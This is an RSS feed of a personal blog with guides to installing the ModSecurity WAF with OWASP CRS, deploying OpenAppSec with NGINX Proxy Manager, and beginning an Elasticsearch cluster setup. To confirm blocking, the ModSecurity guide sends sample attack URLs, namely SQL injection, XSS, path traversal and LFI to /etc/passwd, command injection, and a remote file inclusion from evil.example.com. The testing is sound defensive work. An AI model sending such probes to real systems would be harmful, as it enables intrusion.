<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[Nguyen Duc Chinh]]></title><description><![CDATA[Hi I'm Nguyen Duc Chinh.
This is where I document my daily work and learn.]]></description><link>https://chinhnd.org</link><generator>RSS for Node</generator><lastBuildDate>Thu, 16 Apr 2026 11:53:36 GMT</lastBuildDate><atom:link href="https://chinhnd.org/rss.xml" rel="self" type="application/rss+xml"/><language><![CDATA[en]]></language><ttl>60</ttl><item><title><![CDATA[Secure Your Website: A Complete Guide to Installing ModSecurity v3 and the OWASP CRS]]></title><description><![CDATA[In today's web environment, securing your applications is non-negotiable. One of the most effective ways to protect your server from common web attacks like SQL injection, XSS, and remote code execution is by implementing a Web Application Firewall (...]]></description><link>https://chinhnd.org/secure-your-website-with-modsecurity-and-owasp-crs</link><guid isPermaLink="true">https://chinhnd.org/secure-your-website-with-modsecurity-and-owasp-crs</guid><category><![CDATA[waf]]></category><category><![CDATA[modsecurity]]></category><category><![CDATA[nginx]]></category><category><![CDATA[Security]]></category><dc:creator><![CDATA[Nguyen Duc Chinh]]></dc:creator><pubDate>Thu, 23 Oct 2025 09:11:33 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/stock/unsplash/f5pTwLHCsAg/upload/0b73251a34646570c5bd0ca524ceb404.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>In today's web environment, securing your applications is non-negotiable. One of the most effective ways to protect your server from common web attacks like SQL injection, XSS, and remote code execution is by implementing a Web Application Firewall (WAF).</p>
<p>ModSecurity is the world's most popular open-source WAF engine. When paired with the OWASP Core Rule Set (CRS), it provides a powerful and robust layer of defense.</p>
<p>This guide provides a complete, step-by-step walkthrough for compiling and installing ModSecurity v3 from scratch, integrating it with NGINX as a dynamic module, and enabling the powerful OWASP CRS on an Ubuntu server.</p>
<h1 id="heading-part-1-compiling-and-installing-the-modules-and-enabling-modsecurity-v3">Part 1 – Compiling and Installing the Modules and Enabling ModSecurity v3</h1>
<p>This guide shows the complete installation of ModSecurity v3 with NGINX and the OWASP Core Rule Set (CRS) on an Ubuntu server – including correct module paths, symlink conventions, and example tests.</p>
<h2 id="heading-1-install-dependencies">1. Install Dependencies</h2>
<p>First, let's update our server and install all the necessary build tools and libraries. This includes <code>git</code>, the build essentials, and various development libraries ModSecurity relies on.</p>
<pre><code class="lang-bash">sudo apt update
sudo apt install -y git g++ build-essential autoconf automake libtool \
  libpcre3 libpcre3-dev libpcre2-dev libxml2 libxml2-dev libyajl-dev \
  pkg-config zlib1g zlib1g-dev libcurl4-openssl-dev \
  liblua5.3-dev libgeoip-dev doxygen
</code></pre>
<h2 id="heading-2-compile-and-install-modsecurity-v3">2. Compile and Install ModSecurity v3</h2>
<p>We'll work within the <code>/usr/local/src</code> directory, a common place for building source code. We will clone the ModSecurity repository, initialize its submodules (which are required), and then run the build and installation process.</p>
<pre><code class="lang-bash"><span class="hljs-built_in">cd</span> /usr/<span class="hljs-built_in">local</span>/src
sudo git <span class="hljs-built_in">clone</span> --depth 1 -b v3/master --single-branch https://github.com/SpiderLabs/ModSecurity
<span class="hljs-built_in">cd</span> ModSecurity
sudo git submodule init
sudo git submodule update
sudo ./build.sh
sudo ./configure
sudo make -j<span class="hljs-string">"<span class="hljs-subst">$(nproc)</span>"</span>
sudo make install
sudo apt install nginx
</code></pre>
<p>After a successful build, ModSecurity is installed and, among other files, the directory <code>/usr/local/modsecurity</code> is created.</p>
<h2 id="heading-3-build-the-nginx-module">3. Build the NGINX Module</h2>
<p>Now we need the "glue" that connects NGINX to ModSecurity. This is a dynamic module that must be compiled against your <em>exact</em> running version of NGINX.</p>
<p>First, check your NGINX version:</p>
<pre><code class="lang-bash">nginx -v
</code></pre>
<p>In my case, the output was:</p>
<pre><code class="lang-bash">nginx version: nginx/1.18.0 (Ubuntu)
</code></pre>
<p>Matching that version, you need the corresponding NGINX source to build the connector module. Clone the ModSecurity-nginx repository, download and unpack the NGINX 1.18.0 source, configure it with the dynamic module, and build only the modules with <code>sudo make modules</code>:</p>
<pre><code class="lang-bash"><span class="hljs-built_in">cd</span> /usr/<span class="hljs-built_in">local</span>/src
sudo git <span class="hljs-built_in">clone</span> https://github.com/SpiderLabs/ModSecurity-nginx.git
sudo wget http://nginx.org/download/nginx-1.18.0.tar.gz
sudo tar -xzf nginx-1.18.0.tar.gz
<span class="hljs-built_in">cd</span> nginx-1.18.0
sudo ./configure --with-compat --add-dynamic-module=/usr/<span class="hljs-built_in">local</span>/src/ModSecurity-nginx
sudo make modules
</code></pre>
<h2 id="heading-4-place-and-enable-the-module">4. Place and Enable the Module</h2>
<p>You should now be in the directory <code>/usr/local/src/nginx-1.18.0</code>.</p>
<p>Copy the newly built NGINX module into the modules directory, then create the file <code>mod-modsecurity.conf</code> in <code>modules-available</code> and symlink it from <code>modules-enabled</code>.</p>
<p>This configuration assumes:</p>
<ul>
<li><p>existing modules are in /usr/share/nginx/modules-available</p>
</li>
<li><p>symlinks for enabled modules are in /etc/nginx/modules-enabled</p>
</li>
</ul>
<pre><code class="lang-bash">sudo cp objs/ngx_http_modsecurity_module.so /usr/lib/nginx/modules/
sudo chmod 0644 /usr/lib/nginx/modules/ngx_http_modsecurity_module.so
<span class="hljs-built_in">echo</span> <span class="hljs-string">"load_module modules/ngx_http_modsecurity_module.so;"</span> | sudo tee /usr/share/nginx/modules-available/mod-modsecurity.conf
sudo ln -s /usr/share/nginx/modules-available/mod-modsecurity.conf /etc/nginx/modules-enabled/50-modsecurity.conf
</code></pre>
<h2 id="heading-5-create-modsecurity-configuration">5. Create ModSecurity Configuration</h2>
<p>Next, create the base configuration for ModSecurity.</p>
<pre><code class="lang-bash">sudo mkdir -p /etc/nginx/modsec
<span class="hljs-built_in">cd</span> /etc/nginx/modsec
sudo cp /usr/<span class="hljs-built_in">local</span>/src/ModSecurity/modsecurity.conf-recommended ./modsecurity.conf
sudo cp /usr/<span class="hljs-built_in">local</span>/src/ModSecurity/unicode.mapping .
</code></pre>
<p>If the <code>unicode.mapping</code> file is missing, you can download it via wget:</p>
<pre><code class="lang-bash">wget https://raw.githubusercontent.com/SpiderLabs/ModSecurity/v3/master/unicode.mapping -O /etc/nginx/modsec/unicode.mapping
</code></pre>
<h2 id="heading-6-enable-basic-rules">6. Enable Basic Rules</h2>
<p>You have just copied <code>modsecurity.conf</code> into /etc/nginx/modsec.</p>
<p>Check that the following parameters are set correctly in the file:</p>
<pre><code class="lang-bash">SecRuleEngine On
SecAuditEngine RelevantOnly
SecAuditLog /var/<span class="hljs-built_in">log</span>/modsec_audit.log
</code></pre>
<ul>
<li><p><code>SecRuleEngine On</code>: This is the master switch. It activates ModSecurity.</p>
</li>
<li><p><code>SecAuditEngine RelevantOnly</code>: This logs only requests that were either blocked or generated an error.</p>
</li>
<li><p><code>SecAuditLog</code>: This specifies where to write the audit logs.</p>
</li>
</ul>
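<p>A note on the master switch: besides <code>On</code> and <code>Off</code>, <code>SecRuleEngine</code> also accepts <code>DetectionOnly</code>, which logs rule matches without blocking anything. A minimal sketch for a tuning phase:</p>

```
# Log rule matches but never block — useful while tuning a new rule set
SecRuleEngine DetectionOnly
```

Once you are confident the rules are not blocking legitimate traffic, switch back to <code>SecRuleEngine On</code>.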
<h2 id="heading-7-integrate-the-module-into-your-site-and-test">7. Integrate the Module into Your Site and Test</h2>
<p>Open your site’s NGINX config file in <code>/etc/nginx/sites-enabled</code>.</p>
<p>In the <code>server</code> block, right after <code>listen</code>, insert the following:</p>
<pre><code class="lang-bash">server {
  listen ...
  server_name ...

      <span class="hljs-comment"># activate ModSecurity</span>
    modsecurity on;
    modsecurity_rules_file /etc/nginx/modsec/modsecurity.conf;
</code></pre>
<p>Now create the file <code>/etc/nginx/modsec/modsec_test.conf</code>:</p>
<pre><code class="lang-bash">sudo nano /etc/nginx/modsec/modsec_test.conf
</code></pre>
<p>Add the following content:</p>
<pre><code class="lang-bash"><span class="hljs-comment"># For testing purpose</span>
SecRule REQUEST_URI <span class="hljs-string">"@contains blockme"</span> <span class="hljs-string">"id:1001,phase:1,deny,status:403,msg:'Test rule triggered',chain"</span>
SecRule REQUEST_URI <span class="hljs-string">"@beginsWith /test/"</span>
</code></pre>
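<p>The <code>chain</code> action ties the two rules together: the request is denied only when the URI both contains <code>blockme</code> and begins with <code>/test/</code>. For comparison, a hypothetical standalone variant (the id 1002 is arbitrary and must not collide with other rule ids) that blocks <code>blockme</code> anywhere in the request arguments:</p>

```
# Deny any request whose arguments contain "blockme"
SecRule ARGS "@contains blockme" "id:1002,phase:2,deny,status:403,msg:'Standalone test rule'"
```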
<p>Then edit <code>/etc/nginx/modsec/modsecurity.conf</code>:</p>
<pre><code class="lang-bash">sudo nano /etc/nginx/modsec/modsecurity.conf
</code></pre>
<p>Add this <code>Include</code> line at the end:</p>
<pre><code class="lang-bash">Include /etc/nginx/modsec/modsec_test.conf
</code></pre>
<p>You must now reload <code>nginx</code>:</p>
<pre><code class="lang-bash">sudo nginx -t &amp;&amp; sudo systemctl reload nginx
</code></pre>
<p>From your local computer, send a test request using <code>curl</code>, or just enter the address in your web browser.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1761208122966/0e464253-1f30-4e28-980e-7efb4a518790.png" alt class="image--center mx-auto" /></p>
<p>If you use <code>curl</code>, the result should look similar to:</p>
<pre><code class="lang-bash">curl -i <span class="hljs-string">"http://localhost/test/?test=blockme"</span>
HTTP/1.1 403 Forbidden
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 23 Oct 2025 08:29:47 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
</code></pre>
<p>The important part is <code>HTTP/1.1 403</code>, the HTTP status code for <strong>Forbidden</strong>, meaning the request was blocked and ModSecurity is working.</p>
<h1 id="heading-part-2-download-and-activate-the-owasp-crs">Part 2 – Download and Activate the OWASP CRS</h1>
<p>The following commands will let you download and activate the rule set. Change to the modsec directory, clone the Git repository, and create the <code>crs-setup.conf</code> file:</p>
<pre><code class="lang-bash"><span class="hljs-built_in">cd</span> /etc/nginx/modsec
sudo git <span class="hljs-built_in">clone</span> https://github.com/coreruleset/coreruleset.git

<span class="hljs-built_in">cd</span> coreruleset
sudo cp crs-setup.conf.example crs-setup.conf
</code></pre>
<p>This downloads the latest CRS; the rule files live in the <code>rules</code> subdirectory:</p>
<pre><code class="lang-bash">/etc/nginx/modsec/coreruleset/rules<span class="hljs-comment"># ls</span>
asp-dotnet-errors.data                                REQUEST-944-APPLICATION-ATTACK-JAVA.conf
iis-errors.data                                       REQUEST-949-BLOCKING-EVALUATION.conf
java-classes.data                                     RESPONSE-950-DATA-LEAKAGES.conf
lfi-os-files.data                                     RESPONSE-951-DATA-LEAKAGES-SQL.conf
php-errors.data                                       RESPONSE-952-DATA-LEAKAGES-JAVA.conf
php-function-names-933150.data                        RESPONSE-953-DATA-LEAKAGES-PHP.conf
php-variables.data                                    RESPONSE-954-DATA-LEAKAGES-IIS.conf
REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example   RESPONSE-955-WEB-SHELLS.conf
REQUEST-901-INITIALIZATION.conf                       RESPONSE-956-DATA-LEAKAGES-RUBY.conf
REQUEST-905-COMMON-EXCEPTIONS.conf                    RESPONSE-959-BLOCKING-EVALUATION.conf
REQUEST-911-METHOD-ENFORCEMENT.conf                   RESPONSE-980-CORRELATION.conf
REQUEST-913-SCANNER-DETECTION.conf                    RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example
REQUEST-920-PROTOCOL-ENFORCEMENT.conf                 restricted-files.data
REQUEST-921-PROTOCOL-ATTACK.conf                      restricted-upload.data
REQUEST-922-MULTIPART-ATTACK.conf                     ruby-errors.data
REQUEST-930-APPLICATION-ATTACK-LFI.conf               scanners-user-agents.data
REQUEST-931-APPLICATION-ATTACK-RFI.conf               sql-errors.data
REQUEST-932-APPLICATION-ATTACK-RCE.conf               ssrf.data
REQUEST-933-APPLICATION-ATTACK-PHP.conf               unix-shell-builtins.data
REQUEST-934-APPLICATION-ATTACK-GENERIC.conf           unix-shell.data
REQUEST-941-APPLICATION-ATTACK-XSS.conf               web-shells-asp.data
REQUEST-942-APPLICATION-ATTACK-SQLI.conf              web-shells-php.data
REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf  windows-powershell-commands.data
</code></pre>
<p>Next, add the following <code>Include</code> lines to your <code>modsecurity.conf</code> file to activate the OWASP CRS:</p>
<pre><code class="lang-bash">Include /etc/nginx/modsec/coreruleset/crs-setup.conf
Include /etc/nginx/modsec/coreruleset/rules/*.conf
</code></pre>
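<p>Order matters here: <code>crs-setup.conf</code> must be included before the rule files, because the rules rely on variables it defines. The tail of <code>modsecurity.conf</code> would then look roughly like this (the test include from Part 1 is optional and can be removed once you are done testing):</p>

```
Include /etc/nginx/modsec/modsec_test.conf
Include /etc/nginx/modsec/coreruleset/crs-setup.conf
Include /etc/nginx/modsec/coreruleset/rules/*.conf
```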
<p>After reloading NGINX, the rule set is active:</p>
<pre><code class="lang-bash">sudo nginx -t &amp;&amp; sudo systemctl reload nginx
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf <span class="hljs-built_in">test</span> is successful
</code></pre>
<h2 id="heading-testing-the-owasp-crs">Testing the OWASP CRS</h2>
<p>The following tests can be used to verify that the rule set is working. Either enter the URL in your browser or use <code>curl</code> with the <code>-I</code> parameter.</p>
<p>SQL injection via manipulated parameter: <code>http://ip/?id=1'+or+1=1--</code></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1761208562837/ab66df9c-3cb2-44ef-a30f-13a3b00842cf.png" alt class="image--center mx-auto" /></p>
<p>Cross Site Scripting (XSS) – simple JavaScript: <code>http://ip/?search=&lt;script&gt;alert.js&lt;/script&gt;</code></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1761208682163/5d255e3c-d272-4de4-8bbd-98f79765f162.png" alt class="image--center mx-auto" /></p>
<p>Attempt to access a sensitive <code>.env</code> file: <code>http://ip/.env</code></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1761208738333/81378f09-dd9b-4679-9249-bc55192112fb.png" alt class="image--center mx-auto" /></p>
<p>Path traversal to access system files: <code>http://ip/index.php?file=../../../../etc/passwd</code></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1761208796956/dcd4820e-1dce-469f-a5f6-41d9fa0d1efe.png" alt class="image--center mx-auto" /></p>
<p>Command Injection via GET parameter: <code>http://ip/?cmd=ls%20-la</code></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1761208886728/0927f406-4003-47f8-a88e-61c652b213c7.png" alt class="image--center mx-auto" /></p>
<p>Local File Inclusion (LFI): <code>http://ip/?testfile=../../../../etc/passwd%00</code></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1761209542940/a29aea55-0dc2-40d6-b590-7bfd777ec6e3.png" alt class="image--center mx-auto" /></p>
<p>Remote File Inclusion (RFI): <code>http://ip/?page=http://evil.example.com/shell.txt&amp;cmd=ls</code></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1761210171906/25646912-3b44-4713-990a-b02fa3bfb7f5.png" alt class="image--center mx-auto" /></p>
<p>If you receive 403 responses for these requests, congratulations! Your server is now protected by ModSecurity v3 and the industry-standard OWASP Core Rule Set.</p>
<h1 id="heading-your-server-is-secured-whats-next">Your Server is Secured. What's Next?</h1>
<p>Congratulations! By following this guide, you have successfully compiled ModSecurity v3 from scratch, integrated it as a dynamic NGINX module, and deployed the powerful OWASP Core Rule Set. Your web server now has a formidable, active defense against the web's most common and dangerous attacks.</p>
<p>But the journey doesn't end here. A WAF is not a "set it and forget it" tool. Your immediate next step is to <strong>monitor and tune</strong>.</p>
<ul>
<li><p><strong>Watch the Logs:</strong> Keep a close eye on your ModSecurity audit log, which we configured at <code>/var/log/modsec_audit.log</code>. This file is your best friend. It will show you exactly <em>what</em> is being blocked and <em>why</em>.</p>
</li>
<li><p><strong>Tune for False Positives:</strong> The OWASP CRS is designed to be strict, which means it might occasionally block legitimate requests from your application (known as "false positives"). By analyzing the logs, you can identify these and create custom rules to whitelist specific actions for your application, ensuring normal functionality isn't interrupted.</p>
</li>
<li><p><strong>Stay Updated:</strong> Security is a moving target. Regularly update your OWASP CRS rules by running <code>git pull</code> inside the <code>/etc/nginx/modsec/coreruleset</code> directory to protect against the latest threats.</p>
</li>
</ul>
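<p>As a starting point for log review, the sketch below pulls the triggered rule ids out of an audit log and counts them. The sample entries are illustrative, but the <code>[id "NNNNNN"]</code> fragment they contain is the standard ModSecurity message format the <code>grep</code> pattern relies on:</p>

```shell
# Create a small illustrative sample of audit-log messages
cat > /tmp/modsec_audit_sample.log <<'EOF'
ModSecurity: Access denied with code 403 (phase 2). [id "949110"] [msg "Inbound Anomaly Score Exceeded"]
ModSecurity: Warning. detected SQLi using libinjection. [id "942100"] [msg "SQL Injection Attack Detected"]
ModSecurity: Warning. detected SQLi using libinjection. [id "942100"] [msg "SQL Injection Attack Detected"]
EOF

# Count how often each rule id fired, most frequent first
grep -o 'id "[0-9]*"' /tmp/modsec_audit_sample.log | sort | uniq -c | sort -rn
```

When run against the real <code>/var/log/modsec_audit.log</code>, the ids at the top of this list are the first candidates for false-positive analysis.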
<p>You've built a solid foundation for your web application's security. By actively monitoring and tuning your new WAF, you can maintain a robust defense that is perfectly tailored to your environment.</p>
]]></content:encoded></item><item><title><![CDATA[Secure Your Web Apps in Minutes: OpenAppSec WAF with NGINX Proxy Manager]]></title><description><![CDATA[With OpenAppSec, a modern, open-source WAF designed for simplicity and powerful, pre-emptive threat protection. When combined with the popular NGINX Proxy Manager (NPM), you get a robust, easy-to-use solution for securing your containerized applicati...]]></description><link>https://chinhnd.org/secure-your-web-apps-in-minutes-openappsec-waf-with-nginx-proxy-manager</link><guid isPermaLink="true">https://chinhnd.org/secure-your-web-apps-in-minutes-openappsec-waf-with-nginx-proxy-manager</guid><category><![CDATA[web]]></category><category><![CDATA[Security]]></category><category><![CDATA[waf]]></category><dc:creator><![CDATA[Nguyen Duc Chinh]]></dc:creator><pubDate>Thu, 16 Oct 2025 10:33:41 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/stock/unsplash/tZc3vjPCk-Q/upload/328c83285b5cfcee2682486de1c06a27.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>With <strong>OpenAppSec</strong>, a modern, open-source WAF designed for simplicity and powerful, pre-emptive threat protection. When combined with the popular <strong>NGINX Proxy Manager (NPM)</strong>, you get a robust, easy-to-use solution for securing your containerized applications.</p>
<p>This guide will walk you through deploying OpenAppSec with NGINX Proxy Manager using Docker, all managed from the slick OpenAppSec SaaS Web UI. Let's get started!</p>
<h1 id="heading-prerequisites">Prerequisites</h1>
<p>Before we begin, ensure you have the following ready:</p>
<ul>
<li><p>A Linux server or VM with Docker and Docker Compose installed.</p>
</li>
<li><p>Internet access to pull Docker images and connect to the OpenAppSec cloud.</p>
</li>
<li><p>(Optional) A backend web application you want to protect. For this guide, we'll assume an application is running on port <code>3000</code>.</p>
</li>
<li><p><strong>Deployment Model:</strong></p>
</li>
</ul>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1760611073979/2fbd7965-c1a7-4b84-8503-125fb80edbca.png" alt class="image--center mx-auto" /></p>
<h1 id="heading-fetch-the-deployment-blueprint">Fetch the Deployment Blueprint</h1>
<p>Create a folder for your new open-appsec deployment and switch to that folder, e.g.</p>
<pre><code class="lang-bash">mkdir open-appsec-deployment
<span class="hljs-built_in">cd</span> ./open-appsec-deployment
</code></pre>
<p>Download the Docker Compose file for your desired open-appsec integration:</p>
<pre><code class="lang-bash">wget https://raw.githubusercontent.com/openappsec/openappsec/main/deployment/docker-compose/nginx-proxy-manager-centrally-managed/docker-compose.yaml
</code></pre>
<p>Download the <code>.env</code> file for your desired open-appsec integration and adjust the configuration to your requirements:</p>
<pre><code class="lang-bash">wget https://raw.githubusercontent.com/openappsec/openappsec/main/deployment/docker-compose/nginx-proxy-manager-centrally-managed/.env
</code></pre>
<h1 id="heading-link-your-agent-to-the-openappsec-cloud">Link Your Agent to the OpenAppSec Cloud</h1>
<p>To manage our new WAF, we need to connect it to the central management portal. This is done using a secure token:</p>
<ol>
<li><p>Navigate to the OpenAppSec Portal: <a target="_blank" href="https://my.openappsec.io/">https://my.openappsec.io/</a></p>
</li>
<li><p>Sign up for a free account or log in using your email, Google, or GitHub.</p>
</li>
<li><p>From the "Getting Started" page, follow these steps:</p>
</li>
<li><p>Check the box for "I deployed an Agent".</p>
</li>
<li><p>Click Manage and select the Docker Profile.</p>
</li>
<li><p>For the subtype, choose "NGINX Proxy Manager application security".</p>
</li>
<li><p>Click Enforce Policy.</p>
</li>
<li><p>You will now be presented with a unique management token. <strong>Copy this token.</strong></p>
</li>
</ol>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1760608476204/5b478979-6166-4311-8acf-fe59eae3fc7c.png" alt class="image--center mx-auto" /></p>
<p>Back in your server's terminal, add this token as an environment variable. This allows Docker Compose to inject it into the agent container upon startup.</p>
<p>(Remember to replace YOUR_TOKEN_HERE with the actual token you copied.)</p>
<pre><code class="lang-bash"><span class="hljs-built_in">export</span> TOKEN=<span class="hljs-string">"YOUR_TOKEN_HERE"</span>
</code></pre>
<h1 id="heading-launch-the-stack">Launch the Stack!</h1>
<p>With the configuration in place, it's time to bring everything online. Run the following command to start the services in detached mode (<code>-d</code>), which lets them run in the background.</p>
<pre><code class="lang-bash">docker-compose up -d
</code></pre>
<p>Docker will now pull the necessary images and start the containers. To verify that everything is running correctly, use the <code>docker ps</code> command:</p>
<pre><code class="lang-bash">docker ps -a
</code></pre>
<p>You should see an output similar to this, with the <code>appsec-agent</code> and <code>npm-centrally-managed-attachment</code> containers showing an "Up" status:</p>
<pre><code class="lang-bash">CONTAINER ID   IMAGE                                                                        COMMAND                  CREATED          STATUS          PORTS                                                                                  NAMES
5204903ec4fe   ghcr.io/openappsec/nginx-proxy-manager-centrally-managed-attachment:latest   <span class="hljs-string">"/init"</span>                  9 seconds ago    Up 6 seconds    0.0.0.0:80-81-&gt;80-81/tcp, :::80-81-&gt;80-81/tcp, 0.0.0.0:443-&gt;443/tcp, :::443-&gt;443/tcp   npm-centrally-managed-attachment
4905a185b6fd   ghcr.io/openappsec/agent:latest                                              <span class="hljs-string">"/cp-nano-agent --to…"</span>   9 seconds ago    Up 7 seconds                                                                                           appsec-agent
</code></pre>
<p>You should now see the application on the <a target="_blank" href="https://my.openappsec.io/?utm_medium=playground&amp;utm_source=instruqt&amp;utm_content=management">open-appsec Web UI</a>!</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1760609388653/0412fc55-3a8c-428d-83d1-d8eb86f4231e.png" alt class="image--center mx-auto" /></p>
<h1 id="heading-configure-your-first-proxy-host">Configure Your First Proxy Host</h1>
<p>Now that the stack is running, we need to tell NGINX Proxy Manager how to route traffic to your backend application.</p>
<p>Access the NGINX Proxy Manager web portal at <code>http://&lt;your-server-ip&gt;:81</code>.</p>
<p>On your first login, you'll be prompted to create an admin user and change the password.</p>
<p><a target="_blank" href="https://play.instruqt.com/assets/tracks/qrqhoa8sdfw6/b8a6d6b9e70a1b18433ef2a4756df318/assets/image.png"><img src="https://play.instruqt.com/assets/tracks/qrqhoa8sdfw6/b8a6d6b9e70a1b18433ef2a4756df318/assets/image.png" alt="image.png" /></a></p>
<p>Click <strong>Add Proxy Host</strong>.</p>
<p>Fill in the details for your application. For example, if you have an app named <code>acmeaudit</code> running on the same Docker host:</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1760609194847/9f4d285b-82bd-4791-8f1c-29c0cdbec96a.png" alt class="image--center mx-auto" /></p>
<p><strong>Domain Names</strong>: <code>acmeaudit.local</code> (or your actual domain)</p>
<p><strong>Scheme</strong>: <code>http</code></p>
<p><strong>Forward Hostname / IP</strong>: <code>acmeaudit</code></p>
<p><strong>Forward Port</strong>: <code>3000</code></p>
<p>Click <strong>Save</strong>.</p>
<p>Now, run the following <code>curl</code> command again to verify that NGINX Proxy Manager is serving the ACME Audit application on port 80:</p>
<pre><code class="lang-bash">curl http://localhost
</code></pre>
<h1 id="heading-activate-protection-in-the-openappsec-portal">Activate Protection in the OpenAppSec Portal</h1>
<p>In the <a target="_blank" href="https://my.openappsec.io/?utm_medium=playground&amp;utm_source=instruqt&amp;utm_content=management">open-appsec Web UI</a>, create an asset defining the specific resources that open-appsec should protect, and don't forget to enforce the policy afterwards.</p>
<p>The final and most crucial step is to enable the WAF policy for your application.</p>
<p>Return to your <strong>OpenAppSec Web UI</strong>.</p>
<p>Click on the <strong>Assets</strong> tab in the top navigation menu.</p>
<p>Click <strong>Create a new asset</strong> and fill in the details:</p>
<p><strong>Profile</strong>: Choose the Docker profile you created earlier.</p>
<p><strong>Web application URL</strong>: To protect all traffic to your site, enter <a target="_blank" href="http://*/*"><code>http://*/*</code></a>. You can make this more specific if needed.</p>
<p><a target="_blank" href="https://play.instruqt.com/assets/tracks/yu4tfhxv43ox/7621956f69a37638bb3f89e2a9e501e3/assets/image.png"><img src="https://play.instruqt.com/assets/tracks/yu4tfhxv43ox/7621956f69a37638bb3f89e2a9e501e3/assets/image.png" alt="image.png" /></a></p>
<p>Switch to the <strong>Web</strong> tab within the asset configuration.</p>
<p>Change the <strong>Threat Prevention Mode</strong> from <em>Detect</em> to <strong>Prevent</strong>. This tells the WAF to actively block malicious traffic, not just log it.</p>
<p><a target="_blank" href="https://play.instruqt.com/assets/tracks/61dt18yzccgr/2213b216630b0661bc9784b4a2f59d5a/assets/image.png"><img src="https://play.instruqt.com/assets/tracks/61dt18yzccgr/2213b216630b0661bc9784b4a2f59d5a/assets/image.png" alt="image.png" /></a></p>
<p>Click the <strong>Enforce policy</strong> button in the top right corner.</p>
<p>That's it! Your application is now actively protected by the OpenAppSec WAF. Any changes you make to the security policy in the SaaS portal will be automatically synced to your agent.</p>
<h1 id="heading-conclusion">Conclusion</h1>
<p>You have successfully deployed a powerful, cloud-managed Web Application Firewall in front of your application using Docker. This combination of OpenAppSec and NGINX Proxy Manager provides a streamlined, modern, and highly effective way to manage your web security posture.</p>
<p>From here, you can explore the OpenAppSec portal to fine-tune security rules, monitor traffic, and analyze security events across all your protected assets.</p>
]]></content:encoded></item><item><title><![CDATA[Elasticsearch 9.x.x Installation and Cluster Setup]]></title><description><![CDATA[Elasticsearch is a real-time, distributed search and analytics engine—a powerful open-source tool designed for efficiently storing, searching, and analyzing large volumes of data.
Elasticsearch Installation
Installation Environment and Elasticsearch ...]]></description><link>https://chinhnd.org/elasticsearch-9xx-installation-and-cluster-setup</link><guid isPermaLink="true">https://chinhnd.org/elasticsearch-9xx-installation-and-cluster-setup</guid><category><![CDATA[elasticsearch]]></category><category><![CDATA[SIEM]]></category><category><![CDATA[kibana]]></category><dc:creator><![CDATA[Nguyen Duc Chinh]]></dc:creator><pubDate>Fri, 01 Aug 2025 08:11:53 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/stock/unsplash/aiqKc07b5PA/upload/6deb96f212f69e3d9a29d09ff47aeaab.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Elasticsearch is a real-time, distributed search and analytics engine—a powerful open-source tool designed for efficiently storing, searching, and analyzing large volumes of data.</p>
<h1 id="heading-elasticsearch-installation"><strong>Elasticsearch Installation</strong></h1>
<h2 id="heading-installation-environment-and-elasticsearch-version"><strong>Installation Environment and Elasticsearch Version</strong></h2>
<ul>
<li><p>OS: Ubuntu 24.04 LTS</p>
</li>
<li><p>Elasticsearch: 9.1.0</p>
</li>
</ul>
<p>For cluster configuration, prepare three virtual machines (VMs) as follows:</p>
<div class="hn-table">
<table>
<thead>
<tr>
<td><strong>No.</strong></td><td><strong>host name</strong></td><td><strong>IP</strong></td></tr>
</thead>
<tbody>
<tr>
<td>#1</td><td>es-node1</td><td>192.168.234.128</td></tr>
<tr>
<td>#2</td><td>es-node2</td><td>192.168.234.129</td></tr>
<tr>
<td>#3</td><td>es-node3</td><td>192.168.234.130</td></tr>
</tbody>
</table>
</div><h2 id="heading-download-and-install-elasticsearch"><strong>Download and Install Elasticsearch</strong></h2>
<p>The Debian package for Elasticsearch 9.1.0 can be downloaded from the website and installed as follows:</p>
<pre><code class="lang-sh">wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-9.1.0-amd64.deb
wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-9.1.0-amd64.deb.sha512
shasum -a 512 -c elasticsearch-9.1.0-amd64.deb.sha512
sudo dpkg -i elasticsearch-9.1.0-amd64.deb
</code></pre>
<h1 id="heading-elasticsearch-cluster-configuration"><strong>Elasticsearch Cluster Configuration</strong></h1>
<h2 id="heading-generate-amp-deploy-certificates"><strong>Generate &amp; Deploy Certificates</strong></h2>
<p>To secure inter-node communication, generate a shared SSL/TLS certificate and deploy it to each node:</p>
<pre><code class="lang-plaintext">sudo /usr/share/elasticsearch/bin/elasticsearch-certutil ca
sudo /usr/share/elasticsearch/bin/elasticsearch-certutil cert --ca elastic-stack-ca.p12
</code></pre>
<p>Copy the generated <code>elastic-certificates.p12</code> file to the <code>/etc/elasticsearch/certs/</code> directory on each node:</p>
<pre><code class="lang-plaintext">sudo scp elastic-certificates.p12 root@192.168.234.129:/etc/elasticsearch/certs
sudo scp elastic-certificates.p12 root@192.168.234.130:/etc/elasticsearch/certs
</code></pre>
